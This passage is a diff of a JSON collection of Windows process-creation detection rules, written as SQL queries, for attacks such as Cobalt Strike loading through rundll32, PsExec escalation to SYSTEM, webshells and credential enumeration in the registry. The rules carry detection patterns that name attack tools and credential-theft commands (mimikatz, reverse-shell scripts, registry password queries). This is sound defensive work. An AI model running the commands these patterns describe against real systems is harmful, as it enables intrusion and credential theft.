'\\' AND NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' AND (CommandLine LIKE '% -s %' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\')) AND NOT (CommandLine LIKE '%.dll%' ESCAPE '\\'))) OR (ParentProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\' AND ((NewProcessName LIKE '%\\\\whoami.exe' ESCAPE '\\' AND CommandLine LIKE '% /all%' ESCAPE '\\') OR ((NewProcessName LIKE '%\\\\net.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\net1.exe' ESCAPE '\\') AND CommandLine LIKE '% view%' ESCAPE '\\')))))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentCommandLine LIKE '%conhost%' ESCAPE '\\' AND CommandLine LIKE '%/../../%' ESCAPE '\\')" ], - "filename": "proc_creation_win_malware_dridex.yml" + "filename": "proc_creation_win_conhost_path_traversal.yml" }, { - "title": "Potential Password Spraying Attempt Using Dsacls.EXE", - "id": "bac9fb54-2da7-44e9-988f-11e9a5edbc0c", + "title": "Arbitrary Shell Command Execution Via Settingcontent-Ms", + "id": "24de4f3b-804c-4165-b442-5a06a2302c7e", "status": "experimental", - "description": "Detects possible password spraying attempts using Dsacls", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "The .SettingContent-ms file type was introduced in Windows 10 and allows a user to create \"shortcuts\" to various Windows 10 setting pages. These files are simply XML and contain paths to various Windows 10 settings binaries.", + "author": "Sreeman", "tags": [ + "attack.t1204", + "attack.t1566.001", "attack.execution", - "attack.t1218" + "attack.initial_access" ], "falsepositives": [ - "Legitimate use of dsacls to bind to an LDAP session" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\dsacls.exe' ESCAPE '\\' OR OriginalFileName = 'DSACLS.EXE') AND (CommandLine LIKE '%/user:%' ESCAPE '\\' AND CommandLine LIKE '%/passwd:%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND CommandLine LIKE '%.SettingContent-ms%' ESCAPE '\\' AND NOT (CommandLine LIKE '%immersivecontrolpanel%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_dsacls_password_spray.yml" + "filename": "proc_creation_win_susp_arbitrary_shell_execution_via_settingcontent.yml" }, { - "title": "Explorer Process Tree Break", - "id": "949f1ffb-6e85-4f00-ae1e-c3c5b190d605", + "title": "HH.EXE Execution", + "id": "68c8acb4-1b60-4890-8e82-3ddf7a6dba84", "status": "test", - "description": "Detects a command line process that uses explorer.exe to launch arbitrary commands or binaries,\nwhich is similar to cmd.exe /c, only it breaks the process tree and makes its parent a new instance of explorer spawning from \"svchost\"\n", - "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems), @gott_cyber", + "description": "Detects the usage of \"hh.exe\" to execute \".chm\" files.", + "author": "E.M. Anhaus (originally from Atomic Blue Detections, Dan Beavin), oscd.community", "tags": [ "attack.defense_evasion", - "attack.t1036" + "attack.t1218.001" ], "falsepositives": [ - "Unknown" + "False positives are expected with legitimate \".CHM\"" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (CommandLine LIKE '%/factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b}%' ESCAPE '\\' OR (CommandLine LIKE '%explorer.exe%' ESCAPE '\\' AND CommandLine LIKE '% /root,%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (OriginalFileName = 'HH.exe' OR NewProcessName LIKE '%\\\\hh.exe' ESCAPE '\\') AND CommandLine LIKE '%.chm%' ESCAPE '\\')" ], - "filename": "proc_creation_win_explorer_break_process_tree.yml" + "filename": "proc_creation_win_hh_chm_execution.yml" }, { - "title": "Suspicious Program Names", - "id": "efdd8dd5-cee8-4e59-9390-7d4d5e4dd6f6", + "title": "CobaltStrike Load by Rundll32", + "id": "ae9c6a7c-9521-42a6-915e-5aaa8689d529", "status": "test", - "description": "Detects suspicious patterns in program names or folders that are often found in malicious samples or hacktools", - "author": "Florian Roth (Nextron Systems)", + "description": "Rundll32 can be use by Cobalt Strike with StartW function to load DLLs from the command line.", + "author": "Wojciech Lesicki", + "tags": [ + "attack.defense_evasion", + "attack.t1218.011" + ], "falsepositives": [ - "Legitimate tools that accidentally match on the searched patterns" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\CVE-202%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\CVE202%' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\poc.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\artifact.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\artifact64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\artifact\\_protected.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\artifact32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\artifact32big.exe' ESCAPE '\\' OR NewProcessName LIKE '%obfuscated.exe' ESCAPE '\\' OR NewProcessName LIKE '%obfusc.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\meterpreter' ESCAPE '\\') OR (CommandLine LIKE '%inject.ps1%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-CVE%' ESCAPE '\\' OR CommandLine LIKE '%pupy.ps1%' ESCAPE '\\' OR CommandLine LIKE '%payload.ps1%' ESCAPE '\\' OR CommandLine LIKE '%beacon.ps1%' ESCAPE '\\' OR CommandLine LIKE '%PowerView.ps1%' ESCAPE '\\' OR CommandLine LIKE '%bypass.ps1%' ESCAPE '\\' OR CommandLine LIKE '%obfuscated.ps1%' ESCAPE '\\' OR CommandLine LIKE '%obfusc.ps1%' ESCAPE '\\' OR CommandLine LIKE '%obfus.ps1%' ESCAPE '\\' OR CommandLine LIKE '%obfs.ps1%' ESCAPE '\\' OR CommandLine LIKE '%evil.ps1%' ESCAPE '\\' OR CommandLine LIKE '%MiniDogz.ps1%' ESCAPE '\\' OR CommandLine LIKE '%\\_enc.ps1%' ESCAPE '\\' OR CommandLine LIKE '%\\\\shell.ps1%' ESCAPE '\\' OR CommandLine LIKE '%\\\\rshell.ps1%' ESCAPE '\\' OR CommandLine LIKE '%revshell.ps1%' ESCAPE '\\' OR CommandLine LIKE '%\\\\av.ps1%' ESCAPE '\\' OR CommandLine LIKE '%\\\\av\\_test.ps1%' ESCAPE '\\' OR CommandLine LIKE '%adrecon.ps1%' ESCAPE '\\' OR CommandLine LIKE '%mimikatz.ps1%' ESCAPE '\\' OR CommandLine LIKE '%\\\\PowerUp\\_%' ESCAPE '\\' OR CommandLine LIKE '%powerup.ps1%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Temp\\\\a.ps1%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Temp\\\\p.ps1%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Temp\\\\1.ps1%' ESCAPE '\\' OR CommandLine LIKE '%Hound.ps1%' ESCAPE '\\' OR CommandLine LIKE '%encode.ps1%' ESCAPE '\\' OR CommandLine LIKE '%powercat.ps1%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE' OR (CommandLine LIKE '%rundll32.exe%' ESCAPE '\\' OR CommandLine LIKE '%rundll32 %' ESCAPE '\\')) AND (CommandLine LIKE '%.dll%' ESCAPE '\\' AND (CommandLine LIKE '% StartW' ESCAPE '\\' OR CommandLine LIKE '%,StartW' ESCAPE '\\')))" ], - "filename": "proc_creation_win_susp_progname.yml" + "filename": "proc_creation_win_hktl_cobaltstrike_load_by_rundll32.yml" }, { - "title": "Potential Conti Ransomware Database Dumping Activity", - "id": "2f47f1fd-0901-466e-a770-3b7092834a1b", + "title": "DNS RCE CVE-2020-1350", + "id": "b5281f31-f9cc-4d0d-95d0-45b91c45b487", "status": "test", - "description": "Detects a command used by conti to dump database", - "author": "frack113", + "description": "Detects exploitation of DNS RCE bug reported in CVE-2020-1350 by the detection of suspicious sub process", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.collection", - "attack.t1005" + "attack.initial_access", + "attack.t1190", + "attack.execution", + "attack.t1569.002" ], "falsepositives": [ - "Unknown" + "Unknown but benign sub processes of the Windows DNS service dns.exe" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\sqlcmd.exe' ESCAPE '\\' OR (CommandLine LIKE '%sqlcmd %' ESCAPE '\\' OR CommandLine LIKE '%sqlcmd.exe%' ESCAPE '\\')) AND CommandLine LIKE '% -S localhost %' ESCAPE '\\' AND (CommandLine LIKE '%sys.sysprocesses%' ESCAPE '\\' OR CommandLine LIKE '%master.dbo.sysdatabases%' ESCAPE '\\' OR CommandLine LIKE '%BACKUP DATABASE%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ParentProcessName LIKE '%\\\\System32\\\\dns.exe' ESCAPE '\\' AND NOT ((NewProcessName LIKE '%\\\\System32\\\\werfault.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\System32\\\\conhost.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\System32\\\\dnscmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\System32\\\\dns.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_malware_conti_ransomware_database_dump.yml" + "filename": "proc_creation_win_exploit_cve_2020_1350.yml" }, { - "title": "PUA - NSudo Execution", - "id": "771d1eb5-9587-4568-95fb-9ec44153a012", - "status": "experimental", - "description": "Detects the use of NSudo tool for command execution", - "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali", + "title": "Enumeration for Credentials in Registry", + "id": "e0b0c2ab-3d52-46d9-8cb7-049dc775fbd1", + "status": "test", + "description": "Adversaries may search the Registry on compromised systems for insecurely stored credentials.\nThe Windows Registry stores configuration information that can be used by the system or other programs.\nAdversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services\n", + "author": "frack113", "tags": [ - "attack.execution", - "attack.t1569.002", - "attack.s0029" + "attack.credential_access", + "attack.t1552.002" ], "falsepositives": [ - "Legitimate use by administrators" + "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\NSudo.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\NSudoLC.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\NSudoLG.exe' ESCAPE '\\') OR OriginalFileName IN ('NSudo.exe', 'NSudoLC.exe', 'NSudoLG.exe')) AND (CommandLine LIKE '%-U:S %' ESCAPE '\\' OR CommandLine LIKE '%-U:T %' ESCAPE '\\' OR CommandLine LIKE '%-U:E %' ESCAPE '\\' OR CommandLine LIKE '%-P:E %' ESCAPE '\\' OR CommandLine LIKE '%-M:S %' ESCAPE '\\' OR CommandLine LIKE '%-M:H %' ESCAPE '\\' OR CommandLine LIKE '%-U=S %' ESCAPE '\\' OR CommandLine LIKE '%-U=T %' ESCAPE '\\' OR CommandLine LIKE '%-U=E %' ESCAPE '\\' OR CommandLine LIKE '%-P=E %' ESCAPE '\\' OR CommandLine LIKE '%-M=S %' ESCAPE '\\' OR CommandLine LIKE '%-M=H %' ESCAPE '\\' OR CommandLine LIKE '%-ShowWindowMode:Hide%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\reg.exe' ESCAPE '\\' AND CommandLine LIKE '% query %' ESCAPE '\\' AND CommandLine LIKE '%/t %' ESCAPE '\\' AND CommandLine LIKE '%REG\\_SZ%' ESCAPE '\\' AND CommandLine LIKE '%/s%' ESCAPE '\\') AND ((CommandLine LIKE '%/f %' ESCAPE '\\' AND CommandLine LIKE '%HKLM%' ESCAPE '\\') OR (CommandLine LIKE '%/f %' ESCAPE '\\' AND CommandLine LIKE '%HKCU%' ESCAPE '\\') OR CommandLine LIKE '%HKCU\\\\Software\\\\SimonTatham\\\\PuTTY\\\\Sessions%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_pua_nsudo.yml" + "filename": "proc_creation_win_reg_enumeration_for_credentials_in_registry.yml" }, { - "title": "DLL Sideloading by Microsoft Defender", - "id": "7002aa10-b8d4-47ae-b5ba-51ab07e228b9", + "title": "Remote CHM File Download/Execution Via HH.EXE", + "id": "f57c58b3-ee69-4ef5-9041-455bf39aaa89", "status": "experimental", - "description": "Detects execution of Microsoft Defender's CLI process (MpCmdRun.exe) from the non-default directory which may be an attempt to sideload arbitrary DLL", - "author": "Bhabesh Raj", + "description": "Detects the usage of \"hh.exe\" to execute/download remotely hosted \".chm\" files.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1574.002" + "attack.t1218.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND NewProcessName LIKE '%\\\\MpCmdRun.exe' ESCAPE '\\' AND NOT ((NewProcessName LIKE 'C:\\\\Program Files\\\\Windows Defender\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\Platform\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\winsxs\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files\\\\Microsoft Security Client\\\\MpCmdRun.exe%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (OriginalFileName = 'HH.exe' OR NewProcessName LIKE '%\\\\hh.exe' ESCAPE '\\') AND CommandLine LIKE '%http%' ESCAPE '\\')" ], - "filename": "proc_creation_win_mpcmdrun_dll_sideload_defender.yml" + "filename": "proc_creation_win_hh_chm_remote_download_or_execution.yml" }, { - "title": "Suspicious Electron Application Child Processes", - "id": "f26eb764-fd89-464b-85e2-dc4a8e6e77b8", - "status": "experimental", - "description": "Detects suspicious child processes of electron apps (teams, discord, slack...).\nThis could be a potential sign of \".asar\" file tampering (See reference section for more information)\n", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Visual Studio NodejsTools PressAnyKey Renamed Execution", + "id": "65c3ca2c-525f-4ced-968e-246a713d164f", + "status": "test", + "description": "Detects renamed execution of \"Microsoft.NodejsTools.PressAnyKey.exe\", which can be abused as a LOLBIN to execute arbitrary binaries", + "author": "Nasreddine Bencherchali (Nextron Systems), Florian Roth (Nextron Systems)", "tags": [ - "attack.execution" + "attack.execution", + "attack.defense_evasion", + "attack.t1218" ], "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((ParentProcessName LIKE '%\\\\Teams.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\slack.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\discord.exe' ESCAPE '\\') AND (NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\')) AND NOT (ParentProcessName LIKE '%\\\\Discord.exe' ESCAPE '\\' AND CommandLine LIKE '%\\\\NVSMI\\\\nvidia-smi.exe%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND OriginalFileName = 'Microsoft.NodejsTools.PressAnyKey.exe' AND NOT ((NewProcessName LIKE '%\\\\Microsoft.NodejsTools.PressAnyKey.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_susp_electron_app_children.yml" + "filename": "proc_creation_win_renamed_pressanykey.yml" }, { - "title": "New Root Certificate Installed Via Certutil.EXE", - "id": "d2125259-ddea-4c1c-9c22-977eb5b29cf0", - "status": "test", - "description": "Detects execution of \"certutil\" with the \"addstore\" flag in order to install a new certificate on the system.\nAdversaries may install a root certificate on a compromised system to avoid warnings when connecting to adversary controlled web servers.\n", - "author": "oscd.community, @redcanary, Zach Stanford @svch0st", + "title": "PsExec/PAExec Escalation to LOCAL SYSTEM", + "id": "8834e2f7-6b4b-4f09-8906-d2276470ee23", + "status": "experimental", + "description": "Detects suspicious commandline flags used by PsExec and PAExec to escalate a command line to LOCAL_SYSTEM rights", + "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1553.004" + "attack.resource_development", + "attack.t1587.001" ], "falsepositives": [ - "Help Desk or IT may need to manually add a corporate Root CA on occasion. Need to test if GPO push doesn't trigger FP" + "Admins that use PsExec or PAExec to escalate to the SYSTEM account for maintenance purposes (rare)", + "Users that debug Microsoft Intune issues using the commands mentioned in the official documentation; see https://learn.microsoft.com/en-us/mem/intune/apps/intune-management-extension" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\certutil.exe' ESCAPE '\\' OR OriginalFileName = 'CertUtil.exe') AND (CommandLine LIKE '%/addstore%' ESCAPE '\\' OR CommandLine LIKE '%-addstore%' ESCAPE '\\') AND CommandLine LIKE '%root%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '% -s cmd%' ESCAPE '\\' OR CommandLine LIKE '% /s cmd%' ESCAPE '\\' OR CommandLine LIKE '% -s -i cmd%' ESCAPE '\\' OR CommandLine LIKE '% /s /i cmd%' ESCAPE '\\' OR CommandLine LIKE '% /s -i cmd%' ESCAPE '\\' OR CommandLine LIKE '% -s /i cmd%' ESCAPE '\\' OR CommandLine LIKE '% -i -s cmd%' ESCAPE '\\' OR CommandLine LIKE '% /i /s cmd%' ESCAPE '\\' OR CommandLine LIKE '% -i /s cmd%' ESCAPE '\\' OR CommandLine LIKE '% /i -s cmd%' ESCAPE '\\' OR CommandLine LIKE '% -s pwsh%' ESCAPE '\\' OR CommandLine LIKE '% /s pwsh%' ESCAPE '\\' OR CommandLine LIKE '% -s -i pwsh%' ESCAPE '\\' OR CommandLine LIKE '% /s /i pwsh%' ESCAPE '\\' OR CommandLine LIKE '% /s -i pwsh%' ESCAPE '\\' OR CommandLine LIKE '% -s /i pwsh%' ESCAPE '\\' OR CommandLine LIKE '% -i -s pwsh%' ESCAPE '\\' OR CommandLine LIKE '% /i /s pwsh%' ESCAPE '\\' OR CommandLine LIKE '% -i /s pwsh%' ESCAPE '\\' OR CommandLine LIKE '% /i -s pwsh%' ESCAPE '\\' OR CommandLine LIKE '% -s powershell%' ESCAPE '\\' OR CommandLine LIKE '% /s powershell%' ESCAPE '\\' OR CommandLine LIKE '% -s -i powershell%' ESCAPE '\\' OR CommandLine LIKE '% /s /i powershell%' ESCAPE '\\' OR CommandLine LIKE '% /s -i powershell%' ESCAPE '\\' OR CommandLine LIKE '% -s /i powershell%' ESCAPE '\\' OR CommandLine LIKE '% -i -s powershell%' ESCAPE '\\' OR CommandLine LIKE '% /i /s powershell%' ESCAPE '\\' OR CommandLine LIKE '% -i /s powershell%' ESCAPE '\\' OR CommandLine LIKE '% /i -s powershell%' ESCAPE '\\') AND (CommandLine LIKE '%psexec%' ESCAPE '\\' OR CommandLine LIKE '%paexec%' ESCAPE '\\' OR CommandLine LIKE '%accepteula%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_certutil_certificate_installation.yml" + "filename": "proc_creation_win_sysinternals_psexec_paexec_escalate_system.yml" }, { - "title": "Suspicious Minimized MSEdge Start", - "id": "94771a71-ba41-4b6e-a757-b531372eaab6", - "status": "test", - "description": "Detects the suspicious minimized start of MsEdge browser, which can be used to download files from the Internet", + "title": "Suspicious TSCON Start as SYSTEM", + "id": "9847f263-4a81-424f-970c-875dab15b79b", + "status": "experimental", + "description": "Detects a tscon.exe start as LOCAL SYSTEM", "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.command_and_control", - "attack.t1105" + "attack.t1219" ], "falsepositives": [ - "Software that uses MsEdge to download components in the background (see ParentImage, ParentCommandLine)" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%start /min msedge%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\') AND NewProcessName LIKE '%\\\\tscon.exe' ESCAPE '\\')" ], - "filename": "proc_creation_win_browsers_msedge_minimized_download.yml" + "filename": "proc_creation_win_tscon_localsystem.yml" }, { - "title": "Suspicious Atbroker Execution", - "id": "f24bcaea-0cd1-11eb-adc1-0242ac120002", + "title": "Password Provided In Command Line Of Net.EXE", + "id": "d4498716-1d52-438f-8084-4a603157d131", "status": "test", - "description": "Atbroker executing non-deafualt Assistive Technology applications", - "author": "Mateusz Wydra, oscd.community", + "description": "Detects a when net.exe is called with a password in the command line", + "author": "Tim Shelton (HAWK.IO)", + "falsepositives": [ + "Unknown" + ], + "level": "medium", + "rule": [ + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (((NewProcessName LIKE '%\\\\net.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\net1.exe' ESCAPE '\\') OR OriginalFileName IN ('net.exe', 'net1.exe')) AND (CommandLine LIKE '% use %' ESCAPE '\\' AND CommandLine LIKE '%:%\\\\\\*' ESCAPE '\\' AND CommandLine LIKE '%/USER:% %' ESCAPE '\\')) AND NOT ((CommandLine LIKE '% ' ESCAPE '\\')))" + ], + "filename": "proc_creation_win_net_use_password_plaintext.yml" + }, + { + "title": "Potential CommandLine Path Traversal Via Cmd.EXE", + "id": "087790e3-3287-436c-bccf-cbd0184a7db1", + "status": "test", + "description": "Detects potential path traversal attempt via cmd.exe. Could indicate possible command/argument confusion/hijacking", + "author": "xknow @xknow_infosec, Tim Shelton", "tags": [ - "attack.defense_evasion", - "attack.t1218" + "attack.execution", + "attack.t1059.003" ], "falsepositives": [ - "Legitimate, non-default assistive technology applications execution" + "Java tools are known to produce false-positive when loading libraries" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%AtBroker.exe' ESCAPE '\\' AND CommandLine LIKE '%start%' ESCAPE '\\') AND NOT ((CommandLine LIKE '%animations%' ESCAPE '\\' OR CommandLine LIKE '%audiodescription%' ESCAPE '\\' OR CommandLine LIKE '%caretbrowsing%' ESCAPE '\\' OR CommandLine LIKE '%caretwidth%' ESCAPE '\\' OR CommandLine LIKE '%colorfiltering%' ESCAPE '\\' OR CommandLine LIKE '%cursorscheme%' ESCAPE '\\' OR CommandLine LIKE '%filterkeys%' ESCAPE '\\' OR CommandLine LIKE '%focusborderheight%' ESCAPE '\\' OR CommandLine LIKE '%focusborderwidth%' ESCAPE '\\' OR CommandLine LIKE '%highcontrast%' ESCAPE '\\' OR CommandLine LIKE '%keyboardcues%' ESCAPE '\\' OR CommandLine LIKE '%keyboardpref%' ESCAPE '\\' OR CommandLine LIKE '%magnifierpane%' ESCAPE '\\' OR CommandLine LIKE '%messageduration%' ESCAPE '\\' OR CommandLine LIKE '%minimumhitradius%' ESCAPE '\\' OR CommandLine LIKE '%mousekeys%' ESCAPE '\\' OR CommandLine LIKE '%Narrator%' ESCAPE '\\' OR CommandLine LIKE '%osk%' ESCAPE '\\' OR CommandLine LIKE '%overlappedcontent%' ESCAPE '\\' OR CommandLine LIKE '%showsounds%' ESCAPE '\\' OR CommandLine LIKE '%soundsentry%' ESCAPE '\\' OR CommandLine LIKE '%stickykeys%' ESCAPE '\\' OR CommandLine LIKE '%togglekeys%' ESCAPE '\\' OR CommandLine LIKE '%windowarranging%' ESCAPE '\\' OR CommandLine LIKE '%windowtracking%' ESCAPE '\\' OR CommandLine LIKE '%windowtrackingtimeout%' ESCAPE '\\' OR CommandLine LIKE '%windowtrackingzorder%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((ParentProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR OriginalFileName = 'cmd.exe') AND ((ParentCommandLine LIKE '%/c%' ESCAPE '\\' OR ParentCommandLine LIKE '%/k%' ESCAPE '\\' OR ParentCommandLine LIKE '%/r%' ESCAPE '\\') OR (CommandLine LIKE '%/c%' ESCAPE '\\' OR CommandLine LIKE '%/k%' ESCAPE '\\' OR CommandLine LIKE '%/r%' ESCAPE '\\')) AND (ParentCommandLine = '/../../' OR CommandLine LIKE '%/../../%' ESCAPE '\\')) AND NOT ((CommandLine LIKE '%\\\\Tasktop\\\\keycloak\\\\bin\\\\/../../jre\\\\bin\\\\java%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_lolbin_susp_atbroker.yml" + "filename": "proc_creation_win_cmd_path_traversal.yml" }, { - "title": "Rhadamanthys Stealer Module Launch Via Rundll32.EXE", - "id": "5cdbc2e8-86dd-43df-9a1a-200d4745fba5", + "title": "Use Icacls to Hide File to Everyone", + "id": "4ae81040-fc1c-4249-bfa3-938d260214d9", "status": "experimental", - "description": "Detects the use of Rundll32 to launch an NSIS module that serves as the main stealer capability of Rhadamanthys infostealer, as observed in reports and samples in early 2023", - "author": "TropChaud", + "description": "Detect use of icacls to deny access for everyone in Users folder sometimes used to hide malicious files", + "author": "frack113", "tags": [ "attack.defense_evasion", - "attack.t1218.011" + "attack.t1564.001" ], "falsepositives": [ - "Unknown" + "Legitimate use" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (OriginalFileName = 'RUNDLL32.EXE' OR NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\') AND CommandLine LIKE '%nsis\\_uns%' ESCAPE '\\' AND CommandLine LIKE '%PrintUIEntry%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (OriginalFileName = 'iCACLS.EXE' OR NewProcessName LIKE '%\\\\icacls.exe' ESCAPE '\\') AND (CommandLine LIKE '%C:\\\\Users\\\\%' ESCAPE '\\' AND CommandLine LIKE '%/deny%' ESCAPE '\\' AND CommandLine LIKE '%S-1-1-0:%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_malware_rhadamanthys_stealer_dll_launch.yml" + "filename": "proc_creation_win_icacls_deny.yml" }, { - "title": "DriverQuery.EXE Execution", - "id": "a20def93-0709-4eae-9bd2-31206e21e6b2", - "status": "experimental", - "description": "Detect usage of the \"driverquery\" utility. Which can be used to perform reconnaissance on installed drivers", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "PUA - Mouse Lock Execution", + "id": "c9192ad9-75e5-43eb-8647-82a0a5b493e3", + "status": "test", + "description": "In Kaspersky's 2020 Incident Response Analyst Report they listed legitimate tool \"Mouse Lock\" as being used for both credential access and collection in security incidents.", + "author": "Cian Heasley", "tags": [ - "attack.discovery" + "attack.credential_access", + "attack.collection", + "attack.t1056.002" ], "falsepositives": [ - "Legitimate use by third party tools in order to investigate installed drivers" + "Legitimate uses of Mouse Lock software" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%driverquery.exe' ESCAPE '\\' OR OriginalFileName = 'drvqry.exe'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (Product LIKE '%Mouse Lock%' ESCAPE '\\' OR Company LIKE '%Misc314%' ESCAPE '\\' OR CommandLine LIKE '%Mouse Lock\\_%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_driverquery_usage.yml" + "filename": "proc_creation_win_pua_mouselock_execution.yml" }, { - "title": "HackTool - Htran/NATBypass Execution", - "id": "f5e3b62f-e577-4e59-931e-0a15b2b94e1e", + "title": "Chopper Webshell Process Pattern", + "id": "fa3c117a-bc0d-416e-a31b-0c0e80653efb", "status": "experimental", - "description": "Detects exeuctable names or flags used by Htran or Htran-like tools (e.g. NATBypass)", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects patterns found in process executions cause by China Chopper like tiny (ASPX) webshells", + "author": "Florian Roth (Nextron Systems), MSTI (query)", "tags": [ - "attack.command_and_control", - "attack.t1090", - "attack.s0040" + "attack.persistence", + "attack.t1505.003", + "attack.t1018", + "attack.t1033", + "attack.t1087" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\htran.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\lcx.exe' ESCAPE '\\') OR (CommandLine LIKE '%.exe -tran %' ESCAPE '\\' OR CommandLine LIKE '%.exe -slave %' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\w3wp.exe' ESCAPE '\\' OR ParentProcessName LIKE 